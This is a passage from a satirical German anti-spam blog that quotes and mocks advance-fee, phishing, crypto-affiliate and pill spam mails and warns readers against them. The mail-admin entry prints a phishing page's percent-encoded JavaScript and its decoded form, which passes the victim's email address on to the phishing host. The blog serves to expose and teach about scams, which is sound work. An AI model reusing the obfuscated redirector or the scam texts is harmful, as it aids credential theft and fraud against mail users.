Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


€ 2.130.000,00

Montag, 29. Juni 2020

Das ist toll. Endlich mal ein Betreff einer Spam, in dem drinsteht, um was es geht: Um einen großen Haufen Zaster. 💰

Von: technical@jbix.my
Antwort an: contact.tayebsouami1@gmail.com
An: Recipients <technical@jbix.my>

Erwartungsgemäß ist die Absenderadresse gefälscht, alle weitere Kommunikation soll über eine anonym und kostenlos eingerichtete Mailadresse bei Googles Freemail-Angebot gehen und dieser Müll geht an ganz viele Empfänger, die allesamt im BCC:-Header aufgeführt wurden, damit es nicht auf dem allerersten Blick auffällt. 🤥

Und was ist nach diesem kurzen Ausflug in die geistigen Welten eines gewerbsmäßigen Lügners und Betrügers nun mit den über zwei Megadollar? Mal lesen:

Hallo, Ich bin Tayeb Souami, Sie haben ein Geschenk von 2.130.000,00 €. Am 19. Mai 2018 gewann ich 315,3 Millionen Powerball-Lotterien, von denen ich einige an zehn glückliche Menschen und zehn Wohltätigkeitsorganisationen spende. Ihre E-Mail ging als Sieger hervor. Wenden Sie sich bezüglich Beschwerden und Informationen dringend an die Beschwerdeabteilung. Name: Tayeb Souami E-Mail: contact.tayebsouami1@gmail.com

Hallo, ich bin Ausgedachter Name, und ich schreibe meine Texte immer unstrukturiert in einem Absatz, damit sie schwierig lesbar sind. Ich habe 315,3 Millionen Kraftkugeln gewonnen, und will jetzt zehn wahllos ausgewählten Leuten einfach mal so ein paar Milliönchen schenken, weil sie so schöne Mailadressen mit Wörtern wie „gammelfleisch“ und so haben. Die Sprache, in der ich diese Leute anschreibe, kann ich leider nicht so gut, und für einen Dolmetscher fehlt mir gerade das Kleingeld, denn ich habe nur die großen Scheine zur Hand. Wenn sie weitere lustige Geschichten aus der Hirnwüste eines Vorschussbetrügers hören oder sich beschweren möchten, wenden sie sich an meine Beschwerdeabteilung von Ausgedachter Name. Der Absender meiner E-Mail ist gefälscht, aber glauben sie bitte fest daran, dass der Rest völlig wahr ist, denn nur wenn sie das glauben, kann ich ihnen eine finanzielle Vorleistung nach der anderen aus der Tasche labern. 🤣

Fürwahr, Spammer, du bist ein ganz Großer! 🤦

Möge dir genug Gehirn wachsen, dass du wenigstens merkst, wie unendlich dumm dein Versuch ist und dass du dich deshalb zum ersten Mal in deinem verkackten Dasein für etwas schämen kannst! 🍐

Fix pending mail issue.

Montag, 29. Juni 2020

Nicht drauf reinfallen, es ist Phishing! 🚨

Von: Web Admin <uk@fascil.shop>

Hier spammt der Administrator noch selbst, und…

An: gammelfleisch@tamagothi.de

…weil er das ganze Web nach irgendwelchen Mailadressen durchsucht, landet er mit seinem kriminellen Kommunikationsversuch auch prompt im Töpfchen für Sieger. 🚽

You have new pending messages

Echt? 🕵️

$ ssh -l name mailserver.example.org
name@mailsever.example.org $ mailq
Size             Queue ID                                                    Date
User             From
Status           Recipient
---------------- ---------------------------------------------------------
   0 messages.
name@mailsever.example.org $ _

Nein, habe ich nicht. Der Spammer lügt. 🤥

Dear gammelfleisch@tamagothi.de

Aber so was von ganz genau mein Name mal wieder! 👏

You have 7 New pending mails under the tamagothi.de mail network server. Your mail version 2.0.1 is currently being discontinued from receiving incoming e-mail, and will no longer work 48 hours from 6/27/2020

Was lernen wir aus diesem kurzen Absatz?

  1. Sieben E-Mails können angeblich nicht zugestellt werden. ✉️
  2. Das liegt daran, dass ich immer noch Mail in der Version 2.0.1 verwende, und das kriegt jetzt völlig grundlos keine Mail mehr. 🖕
  3. Wenn ich jetzt nicht von Unkenntnis und Panik getrieben ganz schnell und völlig hirnlos reagiere, funktioniert E-Mail in ein paar Minuten gar nicht mehr für mich. Und zwar ebenfalls grundlos. 🥊🧠

Das ist natürlich Quatsch. Die Protokolle SMTP, IMAP und POP3 sind seit Jahrzehnten praktisch unverändert. Allerdings wurde immer wieder einmal eine kleinere Erweiterung angeflanscht, am häufigsten wohl an SMTP… 😉

Es werden also keine neuen „Mailversionen“ benötigt, um auf E-Mail zuzugreifen. Wenn ich es wollte, könnte ich wohl immer noch mit zehn Jahre alter Mailsoftware meine E-Mail erledigen. Aber wer will schon mit uralten Programmen voller ungefixter Sicherheitslöcher im Internet unterwegs sein, wenn es auch gute aktuelle Software gibt? ☠️

Dieser spammende „Web Admin“ lügt. Das von ihm behauptete Problem existiert nicht. Sein Gefasel soll nur Menschen mit geringen technischen Kenntnissen verblenden, erschrecken und unter gefühlten Zeitdruck setzen, damit sie jetzt klicken:

To retrieve your messages and upgrade to version 5.0.1, kindly follow the information below.

RESTORE MESSAGES NOW

Wer da klickt, lasse alle Hoffnung fahren! 🖱️🔥

$ lynx -mime_header https://wbbw3902889101.us-south.cf.appdomain.cloud/?35d44a299d135d44a299d1a2ba7c89f62ca2ba7c89f62c#gammelfleisch@tamagothi.de:35d44a299d1a2ba7c89f62c=377237g-
HTTP/1.0 200 OK
X-Backside-Transport: OK OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 29 Jun 2020 11:32:47 GMT
Server: Apache
Vary: Accept-Encoding
X-Global-Transaction-ID: 0d28ff5e5ef9d15f91a769e7
Connection: close
Content-Length: 2426

<script type="text/javascript">
  document.write(
    unescape(
      "%3C%21%44%4F%43%54%59%50%45%20%68%74%6D%6C%3E%0A%3C%68%74%6D%6C%20%6C%61%6E%67%3D%22%65%6E%22%3E%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%63%6F%6E%74%65%6E%74%2D%74%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%55%54%46%2D%38%22%3E%0A%20%20%20%20%20%20%0A%0A%3C%64%69%76%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%3B%22%3E%0A%3C%66%6F%72%6D%20%6E%61%6D%65%3D%22%72%74%77%6F%64%6B%6C%70%22%3E%0A%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%68%69%64%64%65%6E%22%20%6E%61%6D%65%3D%22%64%65%6C%73%6B%6A%6D%22%20%73%69%7A%65%3D%22%33%35%22%20%76%61%6C%75%65%3D%22%22%3E%0A%3C%2F%66%6F%72%6D%3E%0A%3C%2F%64%69%76%3E%0A%0A%0A%3C%73%63%72%69%70%74%3E%0A%76%61%72%20%6C%6F%63%61%74%65%20%3D%20%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%0A%64%6F%63%75%6D%65%6E%74%2E%72%74%77%6F%64%6B%6C%70%2E%64%65%6C%73%6B%6A%6D%2E%76%61%6C%75%65%20%3D%20%6C%6F%63%61%74%65%0A%76%61%72%20%74%65%78%74%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%72%74%77%6F%64%6B%6C%70%2E%64%65%6C%73%6B%6A%6D%2E%76%61%6C%75%65%0A%0A%0A%0A%66%75%6E%63%74%69%6F%6E%20%64%65%6C%69%6E%65%61%74%65%28%73%74%72%29%7B%0A%0A%74%68%65%6C%65%66%74%20%3D%20%73%74%72%2E%69%6E%64%65%78%4F%66%28%22%23%22%29%20%2B%20%31%3B%0A%74%68%65%72%69%67%68%74%20%3D%20%73%74%72%2E%6C%61%73%74%49%6E%64%65%78%4F%66%28%22%3A%22%29%3B%0A%72%65%74%75%72%6E%28%73%74%72%2E%73%75%62%73%74%72%69%6E%67%28%74%68%65%6C%65%66%74%2C%20%74%68%65%72%69%67%68%74%29%29%3B%0A%7D%0A%73%65%74%54%69%6D%65%6F%75%74%28%66%75%6E%63%74%69%6F%6E%28%29%20%7B%0A%20%20%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%20%3D%20%22%68%74%74%70%73%3A%2F%2F%77%62%62%77%33%39%30%32%38%38%39%31%30%31%2E%75%73%2D%73%6F%75%74%68%2E%63%66%2E%61%70%70%64%6F%6D%61%69%6E%2E%63%6C%6F%75%64%2F%63%6F%6E%66%69%67%2F%74%6F%6B%65%6E%2F%3F%33%35%64%34%34%61%32%39%39%64%31%61%32%62%61%37%63%38%39%66%36%32%63%3D%22%20%2B%20%64%65%6C%69%6E%65%61%74%65%28%74%65%78%74%29%20%2B%20%22%26%30%30%30%39%79%79%65%69%6E%73%38%32%30%74%6E%74%49%44%3D%31%6B%62%72%33%38%38%77%6E%6A%33%66%36%35%61%63%63%2D%64%32%65%37%2D%30%39%38%75%2D%3A%6A%6E%73%64%6A%6A%38%38%39%30%30%30%77%30%22%3B%0A%7D%2C%20%30%30%30%30%29%3B%0A%3C%2F%73%63%72%69%70%74%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%2F%62%6F%64%79%3E%0A%0A%0A%3C%2F%68%74%6D%6C%3E%0A%0A"
    )
  );
</script>
$ _

[Ja, ich kann die gammelfleisch-Adresse ruhig über eine im Link enthaltene, eindeutige ID bestätigen. Diese Adresse liegt sowieso als Magnet für Spammer im Impressum und kann von jedem Idioten des Internet direkt mit einem Skript aus einer offenen Quelle ausgelesen werden. Mit einer Mailadresse, die ich von Spam freihalten will, würde ich das allerdings nicht machen. Es wäre sehr dumm.]

Ach, so macht man Websites heute. Man schreibt sein HTML-Markup nicht mehr einfach rein, sondern programmiert stattdeseen Javascript, damit ein Programm das HTML-Markup reinschreibt.

Kein Mensch hätte einen derartigen überumständlichen Mummenschanz nötig. Hier will ein krimineller Idiot automatische Analysen erschweren. Aber zum Glück gibt es dafür Abhilfe, wenn man das generierte HTML mal lesen will (Javascript muss dafür erlaubt werden). Ja, ich könnte das auch schnell selbst mit einem dieser erschröcklich anzuschauenden Perl-Einzeiler machen, aber die eben verlinkte Seite kann jeder Mensch benutzen. Vielleicht hat ja der eine oder andere Mitleser auch Interesse. 😉

Beim „Rückgängigmachen der Unlesbarmachung“ kommt folgendes HTML heraus:

<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
      

<div style="display: none;">
<form name="rtwodklp">
<input type="hidden" name="delskjm" size="35" value="">
</form>
</div>


<script>
var locate = window.location
document.rtwodklp.delskjm.value = locate
var text = document.rtwodklp.delskjm.value



function delineate(str){

theleft = str.indexOf("#") + 1;
theright = str.lastIndexOf(":");
return(str.substring(theleft, theright));
}
setTimeout(function() {
  window.location.href = "https://wbbw3902889101.us-south.cf.appdomain.cloud/config/token/?35d44a299d1a2ba7c89f62c=" + delineate(text) + "&0009yyeins820tntID=1kbr388wnj3f65acc-d2e7-098u-:jnsdjj889000w0";
}, 0000);
</script>
</head>
</body>


</html>

Auf so eine tolle Idee muss man auch erstmal kommen! Mit Javascript HTML generieren, das wiederum Javascript beinhaltet, das dann auf eine andere Adresse weiterleitet. Auf so eine Idee kommt nicht jeder. Dafür muss man schon eine vollständig ausgebrannte Blitzbirne sein. 💡

Übrigens: Wer einen Javascript-Blocker benutzt, kann auf Kriminelle, die ihre Absichten dermaßen trickreich vor automatischen Analysen verstecken, niemals hereinfallen. Tut das einfach, wenn es auch in den ersten Tagen ein bisschen unbequem sein kann, mit ein paar Klicks ein paar sinnvolle Ausnahmen zu konfigurieren. Danach hat man viel für seine Computersicherheit getan, und das kann schnell eine Menge Zeit, Geld und Ärger ersparen. 🛡️

Am Ende einiger weiterer Weiterleitungen landet man auf der folgenden Phishing-Website:

Screenshot der Phishing-Seite

Die Zugangsdaten für die eigene Mailadresse, die man dort eingeben soll, gehen direkt an Kriminelle und werden für betrügerische Machenschaften unter fremder Identität benutzt. Das gilt übrigens auch, wenn man hinterher eine scheinbare Fehlermeldung der Marke „falsches Passwort“ angezeigt bekommt. 🙁

Und danach hat man den Schaden. 😫

Die Polizei ermittelt zunächst gegen den Inhaber der Mailadresse, und die Verbrecher bleiben in ihrer Anonymität und bekommen leider keinen längeren Aufenthalt im JVA-Hotel. Dass sie keine „verdächtige“ Freemailer-Adresse benutzen, gibt ihren Betrugsgeschäften sogar noch eine höhere Seriosität und ermöglicht ihnen, einen noch größeren Schaden anzurichten.

Ach ja, die eigene Mailadresse ist danach natürlich auch verbrannt.

Regard

Email Admin 2020 | All rights reserved.

Diese Spam wurde mechanisch erstellt und ist ohne Unterschrift gültig. Natürlich mit proklamierten „geistigen Eigentum“ auf mechanischen Output. 🤡

Attn, Beneficiary

Sonntag, 28. Juni 2020

Qualitätsbetreff! 🏅

Von: deborah mgbogi <mauridatri@tin.it>
Antwort an: mgram22@hotmail.com

Gefälschte Absenderadresse! 🤥

An: undisclosed-recipients: ;

Ganz ganz viele Empfänger! 🚾

GOOD DAY

Qualitätsanrede! 👍

we have concluded to Send your payment through Money Gram money transfer $4,000.00 daily until the total fund of ($3.5MILLION ) is completely transferred. Meanwhile, Mr Hector Giroud has Send you $4,000.00 in your name today.

Wir kennen dich zwar nur unter dem Namen „Guten Tag“, aber wir haben beschlossen, dir völlig grundlos 3,5 Megadollar zuzustecken, indem wir dir…

$ bc -l
bc 1.07.1
Copyright 1991-1994, 1997, 1998, 2000, 2004, 2006, 2008, 2012-2017 Free Software Foundation, Inc.
This is free software with ABSOLUTELY NO WARRANTY.
For details type `warranty'.
3500000 / 4000
875.00000000000000000000
a = 875 / 365
a
2.39726027397260273972
b = a - 2
b * 12
4.76712328767123287664
quit
$ _

…die nächsten zwei Jahre und viereinhalb Monate lang jeden verdammten Tag vier Kilodollar über Money Gram zustecken. Von der Erfindung eines Bankkontos, eines versichert versendeten Schecks oder dergleichen haben wir trotz unseres vielen Geldes noch nie gehört, dashalb verwenden wir ja auch dieses maximal aufwändige Verfahren, das uns und dir eine Menge Arbeit macht und durch die abzockerisch anmutenden Money-Gram-Gebühren sehr teuer ist. 🤦

Wenn du uns diese völlig gehirnverhungerte Geschichte glaubst…

So contact Mr Hector Giroud, through Money Gram money transfer payment Agent to SEND you the MTCN to pick up this $4000 now:

CONTACT PERSON: Mr Hector Giroud
Cell Phone (+229) 6474-■■■■
Email Address:(mgram22@hotmail.com)

…dann glaubst du uns bestimmt auch, dass wir einen eigens dafür bezahlten Geldtransferboten haben, der jeden Tag von unserem großen Geldspeicher aus mit ein paar Banknotenbündeln in der Hand zu Money Gram geht, um dort unsere „Bankgeschäfte“ zu erledigen. 😂

Selbstverständlich wird nur über anonym und kostenlos eingerichtete Mailadressen bei einem Freemailer – in diesem Fall Hotmail von Microsoft – kommuniziert, unverschlüsselt, versteht sich, wenn es um ein paar Megadollar geht. Wer, außer diesen sich hinter Wegwerfadressen versteckenden Weihnachtsmännern aus der Vorschussbetrugs-Spam, braucht in Gelddingen schon Vertraulichkeit? Ist doch nur Geld. 💩

So, und jetzt…

Please remember to Call and ask him to give you the Reference Number, sender name, question and answer to pick up the $4000.00. Also you should send to him your information to cross check it to avoid mistake.
Receiver’s Name________________
Address: ______________________
Country: ______________________
Phone Number: _________________
Your Occupation _______________
I.D Card:______________________

…sei bitte so nett uns sag uns mal, wer du überhaupt bist, bevor wir dir die ersten viertausend Dollar schenken, weil vor 101 Jahren so schön der Versailler Vertrag unterzeichnet wurde. Unendlich wichtig für unser grundloses Geldgeschenk ist deine Telefonnummer, deine Ausweisnummer und dein gegenwärtiger Broterwerb, also gib das auch an! 🤔

Komm, keine Angst! Facebook und Google wissen das doch auch schon alles, da können es auch ruhig ein paar Gangster mit einer IP-Adresse aus Rumänien wissen. Du hast doch nichts zu verbergen! Sagst du doch sonst auch immer! 🐑

Though, Mr Hector Giroud has sent $4000 in your name today so contact Mr Hector Giroud or you call him (+229) 6474-■■■■as soon as you receive this email and tell him to give you the Reference Number, sender name and question/answer to pick the $4000 Please let us know as soon as you received all your fund.

Mein Kumpel Hector hat gerade 4 Kilodollar in deinem Namen „Guten Tag“ abgeschickt, denn einen anderen Namen kennt er ja noch gar nicht. Und jetzt ruf uns mal an, weil du glaubst, dass du dann das Geld einfach abholen kannst, damit wir dir die richtig wirren Geschichten erzählen. Denn schließlich sollst du uns Geld über Money Gram zustecken, eine Vorleistung nach der anderen. Der Puff, in dem wir uns so gern aufhalten, ist nämlich ganz schön teuer, und das viele Kokain geht auf Dauer auch ins Geld. Deshalb geben wir lieber das Geld anderer Leute aus. Jede Vorleistung, die du uns bezahlst, ist weg, weil wir sie einfach verprassen. 💸

Best Regards.
mrs deborah mgbogi.

Dumm wie immer
Der Weihnachtsmann aus der Vorschussbetrugsspam 🎅

Zero risk, no investment, no credit card required. Just one minute a day, give yourself a chance to get rich.

Samstag, 27. Juni 2020

Abt.: Spammende Reichwerdexperten wedeln im Usenet mit Banknoten 💶

Von: sumantasoren@gmail.com
Newsgruppen: comp.lang.python

Dieser freundliche Idiot will natürlich nicht in Python programmieren, sondern nur spammen. Denn er hat ganz viel Geld anzubieten, und das wird er ohne Spam nicht los. Dass aber auch niemals jemand Interesse an diesem Geld hat! 😂

Hi Friends,

Hallöchen, Spammer!

If you have a cell phone, know how to install an app. and want a stable income with unlimited opportunity in the near future, you are in the RIGHT PLACE at the RIGHT TIME to join us.

So so, jeder, der eine App auf seinem Wischofon installieren kann, kann sich also einfach Geld aus der Steckdose ziehen. Oder aus dem nächsten Sendemast. 🔌

Und wie soll das gehen?

You do not need to sell anything, No inventory. No deliveries. No collecting payments. No meetings. No bugging friends. There are no fees to purchase, no quotas, and no limits, no credit card, even no financial commitment required.

Aha, ich muss überhaupt nichts dafür können, haben oder machen. Vielleicht sollte ich nicht so oft meinen Mund aufmachen, denn ich habe mal gehört, dass die Bratwürste im Schlaraffenland sehr tief fliegen. 🧚

You only need to take less than 5 seconds daily. Free training is included.

Das Geld kommt vollautomatisch vom Sendemast in meinen Geldbeutel. Wie durch ein Wunder! 🦄

No Cost, NO credit card required, No Risk, No Hazard
What have you got to lose?

In der Tat, Spammer, wer das für glaubwürdig hält, hat nicht mehr viel zu verlieren. Der Verstand ist ja schon längst weg. 🧠

Is the new cryptocurrency PI Network another scam or legit?

Die Frage, ob ein weiteres Kryptogeld irgendwas taugt, lässt man sich am besten durch die Lektüre so einer asozialen und illegalen Spam beantworten. Da wird man geholfen! 🧟

If you miss the bitcoin at early stage, don’t let this opportunity pass by again.
Just one minute a day, give yourself a chance to get rich.
Zero risk, no investment, no credit card required.

Müsst ihr verstehen. Das ist wie Bitcoin, nur, dass ihr noch nie davon gehört habt. Außer in so einer Spam, die euch verspricht, dass es Banknoten vom Himmel regnen wird. Also verpasst es nicht wieder, so wie damals den Bitcoin. Und damit ihr das auch glaubt…

Pi is a new digital currency developed by Stanford PhDs, with over 3.5 million members worldwide.

…heißt dieses Kryptogeld wie die Kreiszahl π, ist von tollen promovierten Leuten entwickelt worden (in was haben die promoviert) und es hat sogar Mitglieder. Kennen wir ja alle, dass Geld Mitglieder hat. 🙄

Just visit us at
https://www.pinetworkapp.org

Oh, mit toller Website, auf der ich mir eine App für ein Wischofon installieren könnte. Was kann dabei schon schiefgehen? 🍄

Zu schade, ich kann jetzt gar nicht reich werden. Ich habe gar kein Wischofon. Tja, dann muss ich wohl arm bleiben. 🙁

To claim your Pi, follow this link https://minepi.com/suman4kc and use my username (suman4kc) as your invitation code.

Wer aber ein Wischofon hat, möge bitte so nett sein und dafür sorgen, dass der Spammer auch an seine Affiliate-Groschen kommt! Denn an seine mit Spam angepriesene Reichwerdmethode glaubt er selbst nicht so richtig. Deshalb nimmt er lieber diese paar Groschen und spammt mühsam das Usenet voll, statt mit weniger als fünf Sekunden täglicher Telefonwisch-Arbeit reich zu werden. 💩

Die verlinkte Website hat mir in einem Desktop-Browser ohne Javascript leider nichts zu sagen. Ein Blick in den Quelltext zeigt mir aber schnell, dass einmal mehr alles Wesentliche in einem Video gesagt wird, damit Interessenten nicht so sehr mit diesem anstrengenden Lesen überfordert werden. Denn wer leicht und mühelos lesen kann, ist oft schon ein bisschen zu schlau, um auf so einen Beschiss reinzufallen. Für Freunde des unbändigen Lachanfalls, die des Englischen mächtig sind, habe ich das Video aus der Seite rausgefummelt und zu YouTube hochgeladen.

Re

Samstag, 27. Juni 2020

Abt.: Kurz, dumm und kryptisch

Von: bnk.uniii@gmail.com
Antwort an: jrees2022@gmail.com

Gefälschte Absenderadresse. 🤥

An: gammelfleisch@tamagothi.de

Im Töpfchen für Sieger! 🚽

in other to activate the amount of $40.000.000.
For my wife surgery ???? Contact John Rees. Esq
Email- jrees2022@gmail.com
Address, Hunters Island. Kansas.
WhatsApp: +1-518-362-xxxx

Ein drangvoller Ausdruck, der beim Voranschreiten der Kommunikation so über seine eigenen Füße stolpert, dass auch beim dritten Lesen nicht klar ist, was der Spammer mir eigentlich sagen will – wenn man mal davon absieht, dass er einen Vorschussbetrug einleiten möchte. 🧛

Hey Spammer, was hat deine Frau denn? Und was habe ich damit zu tun? 🤦

This email has been checked for viruses by Avast antivirus software.
https://www.avast.com/antivirus

Dieses Blogposting ist frei von digitaler Lepra, getestet von BRAIN.EXE, dem besten Mittel gegen Spam, Schadsoftware, Betrug und im Internet verbreitete Dummheit.

Entf!

Bequem harte Latte kaufen!

Freitag, 26. Juni 2020

Aber ich habe doch noch alle Latten am Zaun.

Wir bieten Lösungen für:

– Menschen, die länger zusammen leben und den Faden der sexuellen Anziehung zueinander entdecken wollen.

Aha, es gibt Lösungen für Fadenentdecker, …

– Männer im reifen Alter, die aufgrund altersbedingter natürlicher Veränderungen im Körper Probleme haben!

…Anfälle von Greisengeilheit, und …

– Männer die aufgrund belastender Arbeit und geistlicher Übermüdung Probleme beim Sex erleben.

…Männer, die so viel und so erschöpfend arbeiten müssen, dass fürs Orgasmüssen keine Kraft mehr übrig ist.

Intellektuell weitgehend verdorrte Männer, die nicht ihr Gehirn, sondern…

Das beste Stück bring nicht mehr ausreichend Leistung? Peinliche Situationen kommen immer wieder? Auch bei gesundem Lebensstiel steht er nicht wie gewohnt?

…das Gebammsel zwischen ihren Beinen für ihr „bestes Stück“ halten und deshalb auch den Unterschied zwischen einem Stil und einem Stiel nicht mehr kennen, sollen sich Pillen kaufen. Vom Spammer. Denn der Spammer ist der beste Apotheker. Wenn man erstmal tot ist, ist alles Leiden und jegliche Peinlichkeit beendet. 💊💀

Und wer weiß: Wenn alle Glieder steif werden, vielleicht auch das eine. :mrgreen:

Wir benötigen keine Kreditakte von Ihnen!
Original Produkte in top Qualität.

Kreditakten werden nicht benötigt.

Männer mag man eben manchmal nur hart.
Ihr Paket wird diskret aus Nürnberg versendet.

Spammer mögen Hirne einfach nur weich. 🧠 Die „Medikamente“ werden diskret in China in Zementmischern angerührt.

Unbestätigter Benachrichtigungskanal

Donnerstag, 25. Juni 2020

Abt.: Einmal das übliche, miese Phishing 🎣

Von: Team Mastercard <ulleinh@ul-base.de>

So so, „Team Mastercard“. Gerade so das Kinderkunststück hinbekommen, die Absenderadresse zu fälschen, aber es nicht einmal überzeugend machen. Typisch Spammer!

Sehr geehrte Kundin, sehr geehrter Kunde,

Stimmt, eines der beiden Geschlechter haben Menschen meistens. Wer seine Kunden behalten will, wird sie trotzdem persönlich ansprechen, statt sie mit maximal unpersönlichen Phrasen zu verachten. Aber hier schreibt ja auch nicht „Mastercard“, hier schreibt ein Betrüger, der naive Menschen dazu bringen will, dass sie ihm Vollzugriff auf die Kreditkarte geben. 💳💸

Ihre Karte wurde mit sofortiger Wirkung eingefroren.

Aber die liegt doch gar nicht im Kühlfach. ❄️

Bis zur Klärung des Falles können Sie keine Zahlungen mehr tätigen außerdem werden bereits getätigte Zahlungen ebenfalls eingefroren.

Hach, der Beistrich ist ein schwieriges Ding, doch das Einfrieren fällt so leicht. Und nicht nur der Beistrich, heute gemeinhin als „Komma“ bezeichnet, ist eine schwierige Sache für unstrukturiert denkende Betrüger aus der dritten Verbrechensliga, auch…

Ihre Karte wurde für einen Datencheck ausgewählt Sie haben eine unbestätigte E-Mail Adresse in Ihrem Konto hinterlegt.

…der Punkt am Ende eines Satzes macht so seine lieben Probleme. Vom…

Mit einem unbestätigtem Benachrichtigungskanal kann nicht gewährleistet werden, dass Sie alle relevanten in Bezug auf Ihre Karte erhalten.

…Sinn in den Wörtern will ich gar nicht erst anfangen, wenn ich von allen relevanten in Bezug lese. 😫

Was steht hier? Hier steht, dass man selbst oder jemand anders eine Mailadresse zu einem Konto geändert hat. Und wenn das geschieht, dann kommt dieses angebliche Mastercard aus der kranken Phantasie der Spammer und Betrüger und bittet seine Kunden darum…

Bitte unterziehen Sie sich umgehend dem Datencheck und führen Sie ebenfalls einen Datenabgleich durch um Ihre Karte wieder freizuschalten. Tun Sie dies nicht wird Ihr Konto geschlossen und wir erheben eine Kontoschließungsgebühr in Höhe von 29.95 EUR.

zum Formular

…entweder sofort, unmittelbar und dringend wie die Deppen in eine E-Mail zu klicken oder grundlos dreißig Øre zu bezahlen und einen Haufen weiterer Probleme zu haben, weil das Konto geschlossen ist und auch vergangene Zahlungen keine richtigen Zahlungen waren. 🥊

Der Link führt natürlich nicht auf eine Website in der Domain von Mastercard, sondern in die Domain rhinopctec (punkt) com, die nichts mit Mastercard zu tun hat. Diese Spam ist ein Zustecksel eines Lesers, und der Link enthielt eine eindeutige ID, so dass ich mir nicht anschauen mochte, was dort kommt, aber typischerweise darf man in einem mehrschrittigen Verfahren…

  1. …seine Login-Daten angeben; und
  2. …diverse Daten angeben, die Mastercard schon lange kennt und die deshalb überhaupt nichts „bestätigen“.

Alles, was man dort eingibt, geht direkt an Betrüger. Mit dem angerichteten Schaden und dem Identitätsmissbrauch hat man jahrelangen Ärger. 🙁

Zum Glück gibt es ein einfaches und hundertprozentig wirksames Mittel gegen Phishing: Niemals in eine E-Mail klicken. Wenn man die Websites über ein Lesezeichen seines Webbrowsers aufruft, kann einem kein Verbrecher einen giftigen Link unterschieben. Macht das! Es kostet nichts und kann schnell tausende von Euro sparen. So eine Phishing-Spam kann deutlich besser sein als dieses Exemplar. Ich habe PayPal-Phishing mit namentlicher Ansprache des Empfängers und in fehlerfreiem Deutsch gesehen, und der Link ging auf eine Punycode-Domain mit Unicode-Zeichen, die den lateinischen Buchstaben der Original-Domain zum Verwechseln ähnlich sahen. Oder sieht hier jemand auf dem ersten Blick den Unterschied zwischen „Mastercard“ und „Маstеrсard“? 🔎

Wer den Unterschied nicht sieht (also vermutlich fast jeder Leser): „Маstеrсard“ enthält vier kyrillische Buchstaben. Und das geht auch mit Domains. Niemand kommt bei so dermaßen gut vergifteten Giftlinks auf den Verdacht, dass es Phishing sein könnte. Wer weiter forschen möchte, kann ja mal versuchen, herauszubekommen, welches der beiden „Маstеrсard“ die vier kyrillischen Buchstaben enthält. Es ist nur eines. Ja, die beiden Wörter sind wirklich verschieden. 🕵️

Und wenn es Bestandteile von Domainnamen wären, würden sie zu zwei völlig verschiedenen Websites führen, ohne dass das – wisst schon: Benutzerfreundlichkeit – leicht erkennbar wäre. 🍄

Und deshalb klickt man niemals, niemals, niemals in E-Mails. 😉

Wir danken Ihnen für Ihre Mithilfe und bitten um Ihr Verständnis.

Oh, so viel pseudohöflicher „Dank“ für Nichts, nachdem man mit Androhungen von Kosten und teuren Folgen zum Klicken quasi gezwungen wurde! 🤮

Mit freundlichen Grüßen,
Ihr Mastercard-Team

Freundlich wie eine Ohrfeige
Ein mieser Phishing-Spammer

Diese Spam ist ein Zustecksel meines Lesers A. H.

WICHTIG

Mittwoch, 24. Juni 2020

Aber so was von tatütata wichtig! 🚑

Heute scheint der Tag des dummen Vorschussbetruges zu sein, vorgetragen in lustigen Texten von betrügerischen Vollidioten. Der hier zitierte Vollidiot hat es auch für nötig gehalten, eine HTML-formatierte E-Mail zu verfassen (und landet allein deshalb bei mir vollautomatisch im Glibbersieb, selbst, wenn er ansonsten eine sehr gute, schwer filterbare Spam machen würde). Das ist um so bedauerlicher für den armen Betrüger, weil er das HTML nicht etwa verwendet, um in einem reich strukturierten Text lesefreundlich einen komplexen Sachverhalt darzulegen, sondern um den gesamten Text seiner schnell aufgeschäumten Spam fett zu setzen, damit er irgendwie nach mehr wuchtiger Wichtigkeit aussieht. Ich wills mal so sagen: Der Spammer hat schon ein gewisses Talent als Komiker. 🤡

Von: Eric DEKONOR <dublond.eric94@gmail.com>
Antwort an: eric.dekonor@gmail.com

Natürlich ist der Absender gefälscht. 🤥

An: undisclosed-recipients: ;

Diese Spam ist Massenware, die an ganz viele Empfänger gleichzeitig geht, und diese Spam versucht das nicht einmal zu verbergen, weil der Spammer glaubt, dass seine Opfer eh viel zu doof sind, um es zu bemerken, so dass sich die Mühe nicht lohnt. Denn wenn er sich Mühe geben wollte, ihr wisst es ja, dann könnte er auch gleich arbeiten gehen. 🛠️

Guten Tag,

Genau mein Name! 👏

In einer kurzen Einführung bin ich Eric DEKONOR, ein Anwalt aus Togo, Westafrika.

Und in einer längeren Einführung bist du Ochuko Mugu, ein Vollidiot von gewerbsmäßigem Vorschussbetrüger aus Nigeria, der von der Naivität oder Dummheit anderer Menschen lebt. 🧛

Natürlich ist dein Name mindestens so echt wie dein gefälschter Absender. 💩

Ich habe eine private Reservierung von meinem Büro in Bezug auf meinen verstorbenen Kunden und einen Staatsbürger Ihres Landes, der denselben Nachnamen trägt wie Sie, […]

Ach, der heißt auch „Guten Tag“? Na, so ein Zufall aber auch! 🤣

[…] der vor einigen Jahren gestorben ist und hier in meinem Land einen nicht beanspruchten Nachlass in einer Bank zurückgelassen hat.

Aha, ich soll dir also bei einem Erbschaftsbetrug helfen. Warum? Na, wegen meines Nachnamens „Guten Tag“. Und vermutlich wegen meiner wunderhübschen Mailadresse. Die mit dem „Gammelfleisch“, auf der deine Müllmail ankam. Denn sonst weißt du ja gar nichts von mir. 👤

Und ich weiß von dir bis jetzt nur, dass du deinen Absender fälschst und deine lustigen Texte an jede Mailadresse spammst, die man irgendwo im Web einsammeln kann. 🚽

Das ist doch…

